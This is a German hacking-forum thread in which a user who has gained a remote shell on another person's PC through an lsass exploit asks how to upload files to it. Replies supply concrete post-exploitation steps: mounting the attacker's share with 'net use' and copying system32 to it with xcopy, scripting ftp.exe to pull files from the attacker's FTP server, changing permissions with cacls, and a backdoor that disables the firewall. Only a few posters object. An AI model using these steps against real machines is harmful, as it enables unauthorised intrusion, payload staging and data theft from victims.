Hackerboard WikiHaboBlog

[HaBo]

 
Virenschutz · Tools & Aggressive Software Tips zum Kampf gegen gegen Viren, Trojaner, CryptoSoft und Programme, die erstellt wurden um Schaden anzurichten, werden hier behandelt. Aber auch Tools aus dem Security Bereich sind hier richtig.

Was machen, wenn ich ne Remote-Shell hab?

Diskussion: Was machen, wenn ich ne Remote-Shell hab? im Forum Virenschutz · Tools & Aggressive Software, in der Kategorie Security Area; Hi all, also zunächst möchte ich mich mal kurz vorstellen, da dies meine erster Beitrag in diesem Forum ist. Also ...

Antwort
Alt 22.11.04, 19:25   #1 (permalink)
 
Registriert seit: 22.11.04
SWiSH Leistung: Facit NTK
SWiSH eine Nachricht über ICQ schicken
Likes: 0
Standard Was machen, wenn ich ne Remote-Shell hab?


Hi all,

also zunächst möchte ich mich mal kurz vorstellen, da dies meine erster Beitrag in diesem Forum ist. Also ich beschäftige mich seit etwa 6 Jahren mit Computern (da hab ich meinen ersten Rechner bekommen. Das war ein VTech :] ) und hab nun schon meine ersten Erfahrungen mit exploits gemacht. Dann beschäftige ich mich auch etwas mit Webdesign (hab aber ironischer weise NOCH keine fertige Homepage ).

Naja, nun zu meiner eigentlichen Frage:

Also ich hab jetzt auf nem Rechner ne Remote-Shell bekommen (sagen wir über lsass-exploit). Wie ist es nun möglich, dateien auf den Rechner zu laden??? wenn ich über ftp das machen will gehts nicht. Dann kommt erst "Benutzer eingeben" und dann nix mehr. Was kann ich tun? Könnte ich ne batch oder so schreiben und wenn ja wie?

Schon mal Danke für die Antworten im Vorraus

SWiSH

SWiSH ist offline   Mit Zitat antworten
Alt 22.11.04, 19:54   #2 (permalink)
 
Registriert seit: 21.08.03
Riskman Leistung: Facit NTK
Riskman eine Nachricht über ICQ schicken
Likes: 0
Standard

xcopy
Riskman ist offline   Mit Zitat antworten
   
HaBOT
 

Werbung ist gerade online    
Alt 22.11.04, 20:07   #3 (permalink)
Themenstarter
 
Registriert seit: 22.11.04
SWiSH Leistung: Facit NTK
SWiSH eine Nachricht über ICQ schicken
Likes: 0
Standard

ähhm net so ausführlich

also soweit ich weiß, ist xcopy also ein befehl zum kopieren von dateien oder verzeichnissen.
Aber wenn ich in der Remote shell bin, kann ich doch nur auf dem PC des "Opfers" die Dateien kopieren oder? Was muss ich machen, um von MEINER Festplatte auf die des Opfers dateien zu kopieren ???
SWiSH ist offline   Mit Zitat antworten
Alt 22.11.04, 21:25   #4 (permalink)
 
Registriert seit: 07.05.03
4future Leistung: Facit NTK
4future eine Nachricht über ICQ schicken
Likes: 0
Standard

da must du dir was anderes zur hand nehmen, telnet oder ssh ist auch nicht zum filetransfer gedacht... du brauchst eine serveranwendung... seis ein webserver, eine windows freigabe... ich nehm jetzt einfach mal an das ist eine windowskiste, du könntest vom remote komputer eine freigabe auf deinem server öffnen... seis mit net use Z: \\deinecomputerip\freigabename und dann könntest du xcopy C:\WIndows\system32\ Z:\unnötig\ machen.... oder du startest bei dir einen ftp server das wär am praktischsten sagen wir mal den lässt du auf port 80 hören (das ist auf den meisten firewalls frei) und dann kannst von remote auf draufconnecten... also du siehst schon es gibt viele möglichkeiten... würd dort mal ein bisschen erkunden z.B. gibt's firewalls usw.

viel spass... und ich hoff für dich das ist kein honeypod
4future ist offline   Mit Zitat antworten
Alt 22.11.04, 21:35   #5 (permalink)
Rushjo
Guest
 
Likes:
Standard

Mhm, eigentlich ein bissel komisch, wenn Du Dir eine Shell besorgen kannst, aber keine Idee hast, was man weiter damit machen soll. :-) Ich würde Dir mal raten, Dir erstmal einen Kopf darüber zu machen, ob es so sinnvoll ist, Dateien vom "eigenen" Rechner nachladen zu lassen bzw. den Exploit vom "eigenen" Rechner zu starten. Viel Spass beim Nachdenken.

MfG Rushjo
  Mit Zitat antworten
Alt 23.11.04, 00:00   #6 (permalink)
Themenstarter
 
Registriert seit: 22.11.04
SWiSH Leistung: Facit NTK
SWiSH eine Nachricht über ICQ schicken
Likes: 0
Standard

jo, hast ja recht. ist sicher etwas riskant. Aber 1. zerstöre ich keine daten und 2. wer sich net up to date hält, der ist selbst schult bzw. is kein pc freak. Und ich denke, wenn ich nichts schlimmes mache, wirds auch nich auffallen

Also das mit dem freigeben ist mir auch schon eingefallen, habs aber noch nich probiert.

Danke nochmal für die antworten
SWiSH ist offline   Mit Zitat antworten
Alt 23.11.04, 11:34   #7 (permalink)
 
Registriert seit: 03.10.01
DocZimmermann Leistung: Facit NTK
Likes: 0
Standard

Ich kann nicht anders:
Zitat:
bzw. is kein pc freak.
Und wer nicht weiß wie er über eine Shell eine Datei laden kann ( Ob nun aus dem Netz oder local ) ist auch kein PC Freak und hat auch selber schuld!

Du machst also den User // Anwender dafür veantwortlich das der Hersteller des betriebssystems müll baut?!!
Ich nehme mal als Beispiel einen älteren Herren der sich noch mühe gibt im Internet Klar zu kommen der Glücklich und zufrieden mit seinem PC ist. Warum wilst du ihm die Schuld zustecken das er sich nicht weiter mit Sicherheit u.s.w. auseinander setzt?
Er vertraut auf sein OS, wo für er ja schließlich Geld bezahlt hat! ( Naja hat aufs falsche Pferd gesetzt aber egal ). Die Schuld liegt da eindeutig beim Hersteller des OS.
Da hast du die falsche einstellung.
Wenn du nichts böses vorhast na dann bau in ein script in die Autostart die automatisch die windows update seite aufruft.

TheDoc
DocZimmermann ist offline   Mit Zitat antworten
Alt 23.11.04, 13:56   #8 (permalink)
Themenstarter
 
Registriert seit: 22.11.04
SWiSH Leistung: Facit NTK
SWiSH eine Nachricht über ICQ schicken
Likes: 0
Standard

jop, du hast sicher Recht, dass es ehr an Microsoft leigt. Aber es ist ja auch meine Absicht, bei demjenigen Lücken zu schließen (aber ich kanns eben noch net). 1. Macht das Fun und 2. bring dem das auch was. Aber dazu muss ich eben dateien hochladen. Ich werde das mit der Freigabe gleich ausprobieren . Und wenn du mal meine Mutter fragst, ob ich ein PC-Freak bin, dann wird die dir sicher was anderes erzählen . Ich bin sicher kein Hacker, aber auch kein Kiddie. Das Wissen eines Hackers ist ja nich alles, was einen Hacker ausmacht (Hacker != Cracker). Aber es ist immer noch ein Teil des Hackens und das kommt einem nicht einfach so zugeflogen. Also dass ich noch viel lernen muss is klar (bin ja auch noch jung ) Aber ich weiß ja auch schon relativ viel...

EDIT: Das mit dem PC-Freak war ja auch ehr so gemeint, dass dem das sicher nicht auffallen wird, wenn ich keinen mist baue. (und er mich somit auch nicht anzeigt ... hoff ich...)
SWiSH ist offline   Mit Zitat antworten
Alt 23.11.04, 14:18   #9 (permalink)
Senior Member
 
Benutzerbild von t3rr0r.bYt3
 
Registriert seit: 07.01.03
t3rr0r.bYt3 Leistung: Z3
Likes: 13
Standard

bevordas jetz in eine grundsatz-diskussion ausartet:

du erinnerst dich doch sicher an den windows-internen ftp-client (ftp.exe)..
den könnte man ja missbrauchen..

und weil man den nicht aufm desktop hat und nix eintippen kann (ich meine den ftp.exe auf der opferrechner), muss der sich die infos woanders herholen.. z.b. aus einer text-datei (z.b. mit dos-befehlen )

im klartext: schreib ne batch, die alle anweisungen enthält (connect zu deinem homeFTP/pub/was-auch-immer; login-infos; zu holende files) und starte dann ftp.exe mit, das dieses file einlesen soll..
t3rr0r.bYt3 ist offline   Mit Zitat antworten
Alt 12.12.05, 19:24   #10 (permalink)
 
Registriert seit: 11.06.05
sicarius Leistung: Facit NTK
Likes: 0
Standard

hm... ich weiß nicht genau,
ab welcher windows version die net-befehle
benutzt werden können,
aber sonst könntest du doch die nehmen...

"net share" um nen ordner freizugeben (per netbios)
"net use" um per shell ein netzlaufwerk zu mounten (auch netbios ^^)

...also das wäre jedenfalls mein ansatz...
-> und wenn dir die zugriffsrecht fehlen,
kannste die unter ntfs-dateisystem mit cacls ändern...
sicarius ist offline   Mit Zitat antworten
Alt 12.12.05, 19:42   #11 (permalink)
 
Registriert seit: 16.07.05
benwilliam Leistung: Facit NTK
benwilliam eine Nachricht über ICQ schicken
Likes: 0
Standard

schon mal auf das erstelldatum geachtet??
benwilliam ist offline   Mit Zitat antworten
Alt 12.12.05, 22:45   #12 (permalink)
 
Benutzerbild von _fux_
 
Registriert seit: 13.09.05
_fux_ Leistung: Abacus
Likes: 5
Standard

also oder du bist ganz krass und schreibst dir schnell mal nen kleinen backdoor, der dann die firewall auser kraft setzt und anschließend erkennt, welches es war und die tray icon ersetzt... gerade unter windows ist sowas ja noch ohne weiteres möglich.


rofl jetzt grad wo obe drüber steht " schonmal auf das erstellungsdatum geachtet"

omg *g
__________________
und?
_fux_ ist offline   Mit Zitat antworten
Antwort
   

Werbung ist gerade online    

[HaBo] » Security Area » Virenschutz · Tools & Aggressive Software » Was machen, wenn ich ne Remote-Shell hab?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Was würdet ihr machen wenn ihr Millionär wärt? pfaffi7 Umfragen 66 09.08.09 15:07
DCOM RPC Remote Shell HackJack (In)security allgemein 9 30.05.05 21:34
Was machen wenn die Freundin unbedingt Tanzen will Crypt HaBo Lounge 8 10.12.03 13:19
Securen von NT/Shell für remote installieren ? nickless Windows 4 06.05.03 15:23
REMOTE SHELL in C++ Rushjo Code Kitchen 11 22.12.02 23:11


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61